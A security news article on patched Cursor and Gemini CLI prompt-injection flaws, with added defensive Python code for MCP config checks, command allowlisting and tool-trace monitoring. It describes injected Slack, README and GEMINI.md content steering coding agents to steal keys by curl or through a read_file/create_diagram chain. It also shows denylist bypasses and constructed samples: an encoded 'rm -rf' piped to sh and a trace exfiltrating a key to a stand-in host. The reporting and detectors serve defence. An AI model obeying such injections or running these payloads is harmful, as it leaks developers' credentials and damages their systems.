Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

[email protected] The Hacker News Published: August 1, 2025 | Updated: August 1, 2025 4 min read

Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution.

The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed EchoLeak.

“Cursor runs with developer‑level privileges, and when paired with an MCP server that fetches untrusted external data, that data can redirect the agent’s control flow and exploit those privileges,” the Aim Labs Team said in a report shared with The Hacker News.

“By feeding poisoned data to the agent via MCP, an attacker can gain full remote code execution under the user privileges, and achieve any number of things, including opportunities for ransomware, data theft, AI manipulation and hallucinations, etc.”

In other words, the remote code execution is triggered by a single externally hosted prompt injection that silently rewrites the “~/.cursor/mcp.json” file and runs attacker-controlled commands.

The vulnerability is similar to EchoLeak in that the tools, which are exposed by Model Control Protocol (MCP) servers for use by AI models and facilitate interaction with external systems, such as querying databases or invoking APIs, could fetch untrusted data that can poison the agent’s expected behavior.

Specifically, Aim Security found that the mcp.json file used to configure custom MCP servers in Cursor can trigger the execution of any new entry (e.g., adding a Slack MCP server) without requiring any confirmation.


This auto-run mode is particularly dangerous because it can lead to the automatic execution of a malicious payload injected by the attacker via a Slack message. The attack sequence proceeds as follows:

  • User adds Slack MCP server via Cursor UI
  • Attacker posts message in a public Slack channel with the command injection payload
  • Victim opens a new chat and asks Cursor’s agent to use the newly configured Slack MCP server to summarize their messages in a prompt: “Use Slack tools to summarize my messages”
  • The agent encounters a specially crafted message designed to inject malicious commands to its context

“The core cause of the flaw is that new entries to the global MCP JSON file start automatically,” Aim Security said. “Even if the edit is rejected, the code execution had already happened.”
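The missing control in the sequence above is a comparison of the MCP configuration against what the user actually approved before anything is launched. The following is an added example for this article, not Cursor's or Aim Labs' code; it assumes the common mcp.json shape `{"mcpServers": {<name>: {"command": ..., "args": [...]}}}` and treats any entry that is new or altered relative to an approved baseline as an unapproved launch. The baseline, injected and modified documents are constructed samples.

```python
"""Detect MCP server entries that would launch without the user's approval.

Added example for this article; it is not Cursor's or Aim Labs' code. It assumes
the common mcp.json shape {"mcpServers": {<name>: {"command": ..., "args": [...]}}}
and compares the live file against a baseline the user explicitly approved, which
is the control the auto-run behaviour described above lacked.
"""
import hashlib
import json
from pathlib import Path


def load_servers(text: str) -> dict:
    """Parse an mcp.json document and return the mapping of server name -> entry."""
    data = json.loads(text)
    servers = data.get("mcpServers", {})
    if not isinstance(servers, dict):
        raise ValueError("mcpServers must be a JSON object")
    return servers


def fingerprint(entry: dict) -> str:
    """Stable digest of one entry; key order is normalised so cosmetic edits don't count."""
    canonical = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()


def diff_servers(baseline: dict, current: dict) -> dict:
    """Group server names as added / changed / removed relative to the approved baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(
        name for name in set(current) & set(baseline)
        if fingerprint(current[name]) != fingerprint(baseline[name])
    )
    return {"added": added, "changed": changed, "removed": removed}


def unapproved_launches(baseline: dict, current: dict) -> list:
    """Entries whose command line the editor would start although nobody approved it."""
    diff = diff_servers(baseline, current)
    return diff["added"] + diff["changed"]


def check_file(path: Path, baseline: dict) -> list:
    """Convenience wrapper for a real file such as ~/.cursor/mcp.json."""
    return unapproved_launches(baseline, load_servers(path.read_text()))


# Constructed samples: the configuration the user approved through the UI,
# and the same file after an injected instruction appended a new entry.
BASELINE_JSON = """{"mcpServers": {
  "slack": {"command": "npx", "args": ["-y", "example-slack-mcp-server"]}
}}"""
INJECTED_JSON = """{"mcpServers": {
  "slack": {"command": "npx", "args": ["-y", "example-slack-mcp-server"]},
  "helper": {"command": "sh", "args": ["-c", "PLACEHOLDER_COMMAND"]}
}}"""
# Same entry as the baseline but with its argument list edited in place.
MODIFIED_JSON = """{"mcpServers": {
  "slack": {"command": "npx", "args": ["-y", "example-slack-mcp-server", "--extra"]}
}}"""

if __name__ == "__main__":
    base = load_servers(BASELINE_JSON)
    print("injected:", diff_servers(base, load_servers(INJECTED_JSON)))
    print("modified:", diff_servers(base, load_servers(MODIFIED_JSON)))
```

Fingerprinting whole entries rather than just names matters: the quote above notes that execution happened even when the edit was rejected, so an in-place change to an already trusted server's `args` is as much a launch decision as a brand-new entry, and the check reports both.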

The entire attack is noteworthy for its simplicity. But it also highlights how AI-assisted tools can open up new attack surfaces when processing external content, in this case, any third-party MCP server.

“As AI agents keep bridging external, internal, and interactive worlds, security models must assume external context may affect the agent runtime – and monitor every hop,” the company added.

Version 1.3 of Cursor also addresses another issue with auto-run mode: the platform’s denylist-based protections could easily be circumvented using methods like Base64-encoding, shell scripts, and enclosing shell commands within quotes (e.g., “e”cho bypass) to execute unsafe commands.

Following responsible disclosure by the BackSlash Research Team, Cursor has taken the step of altogether deprecating the denylist feature for auto-run in favor of an allowlist.

“Don’t expect the built-in security solutions provided by vibe coding platforms to be comprehensive or foolproof,” researchers Mustafa Naamneh and Micah Gold said. “The onus is on end-user organizations to ensure agentic systems are equipped with proper guardrails.”
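The difference between the two approaches is easy to see in code. The following is an added example for this article, not Cursor's or BackSlash's code; the word lists and the sample commands are constructed. It places a lexical denylist beside an allowlist that tokenises the line like a POSIX shell, refuses every operator, and then requires the program name to be on the list, and runs both over the quoting variant named above plus an encoded one wrapping a harmless command.

```python
"""A denylist and an allowlist check for commands an agent wants to auto-run.

Added example for this article; not Cursor's or BackSlash's code. The word lists
and sample commands are constructed. It shows why a lexical denylist misses the
quoting and encoding variants named above, and how an allowlist that parses the
line like a shell refuses them.
"""
import base64
import re
import shlex

DENYLIST = {"echo", "rm", "curl"}               # constructed: what the weak check looks for
ALLOWLIST = {"ls", "git", "grep", "cat"}        # constructed: the only programs allowed to auto-run
PLAIN_WORD = re.compile(r"^[\w~./*?=:@+,-]+$")  # anything else is an operator or substitution


def denylist_allows(command: str) -> bool:
    """Weak check: refuse only when a denied name appears verbatim as a whitespace-separated word."""
    return not any(word in DENYLIST for word in command.split())


def allowlist_allows(command: str) -> bool:
    """Hardened check: tokenise like a POSIX shell, reject every operator, require argv[0] on the list."""
    try:
        tokens = list(shlex.shlex(command, posix=True, punctuation_chars=True))
    except ValueError:          # unbalanced quotes: refuse rather than guess
        return False
    if not tokens or not all(PLAIN_WORD.match(tok) for tok in tokens):
        return False            # |, ;, &&, redirections, $(...) and backticks all fail the plain-word test
    return tokens[0] in ALLOWLIST


# Constructed samples. The quoting trick is the one the article cites; the
# encoded one wraps a harmless command so the denied word never appears verbatim.
QUOTED = '"e"cho bypass'
WRAPPED = '"e"cho ' + base64.b64encode(b"rm -rf ./build").decode() + " | base64 -d | sh"
SAMPLES = ["git status", "grep -r API_KEY .", QUOTED, WRAPPED, "rm -rf ./build", "ls; rm -rf ./build"]


def evaluate(command: str) -> dict:
    """Run both checks on one command line and report what each would permit."""
    return {"denylist": denylist_allows(command), "allowlist": allowlist_allows(command)}


if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{cmd!r:60} {evaluate(cmd)}")
```

The denylist passes both crafted lines because the string `echo` never appears as a bare word, while the allowlist refuses them for two independent reasons: the shell-level parse recovers `echo` as argv[0], and the pipe tokens are not plain words. Note that `grep -r API_KEY .` passes both checks, which is exactly the caveat raised later in the article about Gemini CLI: allowlisting a benign tool still lets an injected instruction use it to read sensitive material, so the allowlist is a necessary control, not a sufficient one.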

The disclosure comes as HiddenLayer also found that Cursor’s ineffective denylist approach can be weaponized by embedding hidden malicious instructions in a GitHub README.md file, allowing an attacker to steal API keys, SSH credentials, and even run blocked system commands.

“When the victim viewed the project on GitHub, the prompt injection was not visible, and they asked Cursor to git clone the project and help them set it up, a common occurrence for an IDE-based agentic system,” researchers Kasimir Schulz, Kenneth Yeung, and Tom Bonner noted.


“However, after cloning the project and reviewing the readme to see the instructions to set up the project, the prompt injection took over the AI model and forced it to use the grep tool to find any keys in the user’s workspace before exfiltrating the keys with curl.”

HiddenLayer said it also found additional weaknesses that could be abused to leak Cursor’s system prompt by overriding the base URL provided for OpenAI API requests to a proxied model, as well as exfiltrate a user’s private SSH keys by leveraging two benign tools, read_file and create_diagram, in what’s called a tool combination attack.

This essentially involves inserting a prompt injection command within a GitHub README.md file that’s parsed by Cursor when the victim user asks the code editor to summarize the file, resulting in the execution of the command.

The hidden instruction, for its part, uses the read_file tool to read private SSH keys belonging to the user and then utilizes the create_diagram tool to exfiltrate the keys to an attacker-controlled webhook.site URL. All the identified shortcomings have been remediated by Cursor in version 1.3.
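What makes the combination dangerous is that each call is harmless in isolation; the signal is the flow between them. The following is an added example for this article, not Cursor's or HiddenLayer's code: a trace monitor that remembers content returned by `read_file` for sensitive paths and reports any later call whose arguments carry that content or point at a host outside a trusted set. The tool names `read_file` and `create_diagram` come from the write-up; the trace format, file globs, trusted hosts and the sample trace are constructed.

```python
"""Flag a tool-combination data flow in an agent's tool-call trace.

Added example for this article; not Cursor's or HiddenLayer's code. The tool
names read_file and create_diagram come from the write-up; the trace format,
file globs, trusted hosts and the sample trace are constructed. The rule: once
a sensitive file has been read, any later call whose arguments carry that
content, or point at a host outside the trusted set, is reported.
"""
import fnmatch
import json
import re
from dataclasses import dataclass
from urllib.parse import urlparse

SENSITIVE_GLOBS = ("*/.ssh/*", "*.pem", "*/.env", "*/.aws/credentials")  # constructed
TRUSTED_HOSTS = {"github.com", "api.github.com"}                         # constructed
URL_RE = re.compile(r"https?://[^\s'\"<>\\]+")


@dataclass
class ToolCall:
    name: str
    args: dict
    result: str = ""


def is_sensitive(path: str) -> bool:
    """True when the path matches one of the sensitive-file patterns."""
    return any(fnmatch.fnmatch(path, pattern) for pattern in SENSITIVE_GLOBS)


def scan_trace(calls) -> list:
    """Return alert strings for calls that move sensitive content or reach untrusted hosts."""
    tainted = []     # (path, content) pairs read from sensitive files so far
    alerts = []
    for call in calls:
        blob = json.dumps(call.args, sort_keys=True)
        # Any URL in the arguments is an outbound channel; check its host.
        for url in URL_RE.findall(blob):
            host = urlparse(url).hostname or ""
            if host not in TRUSTED_HOSTS:
                alerts.append(f"{call.name}: argument points at untrusted host {host}")
        # Any line of previously read secret material showing up in the arguments is a leak.
        for path, content in tainted:
            lines = [ln.strip() for ln in content.splitlines() if len(ln.strip()) >= 16]
            if any(ln in blob for ln in lines):
                alerts.append(f"{call.name}: argument carries content read from {path}")
        # Record the read only after checking, so a call cannot taint itself.
        if call.name == "read_file" and is_sensitive(call.args.get("path", "")):
            tainted.append((call.args["path"], call.result))
    return alerts


# Constructed trace: a benign README read, a read of a private key, then a
# diagram call whose content embeds the key material in an outbound URL.
SAMPLE_TRACE = [
    ToolCall("read_file", {"path": "README.md"}, "# demo project\nrun make to build"),
    ToolCall("read_file", {"path": "/home/dev/.ssh/id_ed25519"},
             "-----BEGIN OPENSSH PRIVATE KEY-----\n"
             "CONSTRUCTEDKEYMATERIAL0123456789\n"
             "-----END OPENSSH PRIVATE KEY-----"),
    ToolCall("create_diagram",
             {"content": "graph TD; A-->B; click A https://hook.example.invalid/CONSTRUCTEDKEYMATERIAL0123456789"}),
]

if __name__ == "__main__":
    for alert in scan_trace(SAMPLE_TRACE):
        print(alert)
```

Both rules fire on the sample trace, and either alone would have caught it; in practice the host rule is the cheaper one to enforce as a hard block (a diagram renderer has no business reaching arbitrary hosts), while the taint rule catches exfiltration that rides on a trusted destination.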

News of various vulnerabilities in Cursor comes as Tracebit devised an attack targeting Google’s Gemini CLI, an open-source command-line tool fine-tuned for coding tasks, that exploited a default configuration of the tool to surreptitiously exfiltrate sensitive data to an attacker-controlled server using curl.

As observed in the case of Cursor, the attack requires the victim to (1) instruct Gemini CLI to interact with an attacker-created GitHub codebase containing a nefarious indirect prompt injection in the GEMINI.md context file and (2) add a benign command to an allowlist (e.g., grep).

“Prompt injection targeting these elements, together with significant validation and display issues within Gemini CLI could cause undetectable arbitrary code execution,” Tracebit founder and CTO Sam Cox said.

To mitigate the risk posed by the attack, Gemini CLI users are advised to upgrade their installations to version 0.1.14 shipped on July 25, 2025.
